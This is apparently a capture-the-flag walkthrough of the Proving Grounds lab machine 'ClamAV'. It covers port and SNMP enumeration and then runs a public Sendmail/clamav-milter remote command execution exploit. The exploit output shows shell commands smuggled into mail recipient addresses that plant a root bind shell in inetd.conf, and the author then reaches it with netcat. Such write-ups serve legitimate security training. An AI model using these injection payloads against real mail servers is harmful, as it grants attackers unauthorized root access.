Post

ClamAV Walkthrough

Posted
By shanks 4 min read

ClamAV is a Linux machine from Offsec’s Learning Plataform: Proving Grounds.

The name reflects an open-source antivirus engine.

Let’s begin!

Enumeration

I started off by firing up rustscan since it’s faster lol, and to give me an overview of the open ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ rustscan -r 1-65535 --scripts none -a 192.168.199.42 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

Open 192.168.199.42:22
Open 192.168.199.42:25
Open 192.168.199.42:80
Open 192.168.199.42:139
Open 192.168.199.42:199
Open 192.168.199.42:445
Open 192.168.199.42:60000
192.168.199.42 -> [22,25,80,139,199,445,60000]

Then a nmap scan to check for services.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ nmap -sCV -T5 --min-rate=5000 -v 192.168.199.42       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 11:08 EDT
[...]
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.249], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open  smux        Linux SNMP multiplexer
445/tcp open  netbios-P   Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-24T15:08:13-04:00
| nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   0XBABE<00>           Flags: <unique><active>
|   0XBABE<03>           Flags: <unique><active>
|   0XBABE<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5h59m46s, deviation: 2h49m42s, median: 3h59m46s

There’s a lot of info, this is because this box have a lot of rabbit holes and I got stuck in a few of them, so you’re free to check all the ports.

For example on Port 80:

port

Using CyberChef to decode from Binary.

cyber

Dead end! lulz

Enumerating SNMP

Since the name of the box is ClamAV we can check that SNMP for some clue.

Thanks hacktricks!

Enumerating a bit more we find:

1
2
3
4
5
6
7
8
9
10

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ snmp-check 192.168.199.42 
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.199.42:161 using SNMPv1 and community 'public'

[*] System information:
[...]
runnable    clamav-milter   /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl

It says it’s running clamav-milter, so let’s check searchsploit for Sendmail clamav-milter.

1
2
3
4
5
6
7

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ searchsploit Sendmail clamav-milter
--------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                         |  Path
--------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                        | multiple/remote/4761.pl
---------------------------------------------------------------------------------------

Bingo! This is the one Sendmail with clamav-milter < 0.91.2 - Remote Command Execution.

Executing the exploit

Checking the code, we need to give the IP so it opens a new port we can connect to.

code

We execute it like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ perl 4761.pl 192.168.199.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.199.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 24 Jun 2023 15:23:50 -0400; (No UCE/UBE) logging access from: [192.168.45.249](FAIL)-[192.168.45.249]
250-localhost.localdomain Hello [192.168.45.249], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 35OJNoHH004194 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Connecting with Netcat

Right now, we only connect to the new open port at 31337.

1
2
3
4
5
6
7
8

┌──(kali㉿anakin)-[~/offsec/ClamAV]
└─$ nc -nv 192.168.199.42 31337
(UNKNOWN) [192.168.199.42] 31337 (?) open
id & whoami & hostname & cat /root/proof.txt
uid=0(root) gid=0(root) groups=0(root)
root
0xbabe.local
d594[redacted]5da85e

And we are root! No need for privesc.

Happy hacking!

kamusari

This post is licensed under CC BY 4.0 by the author.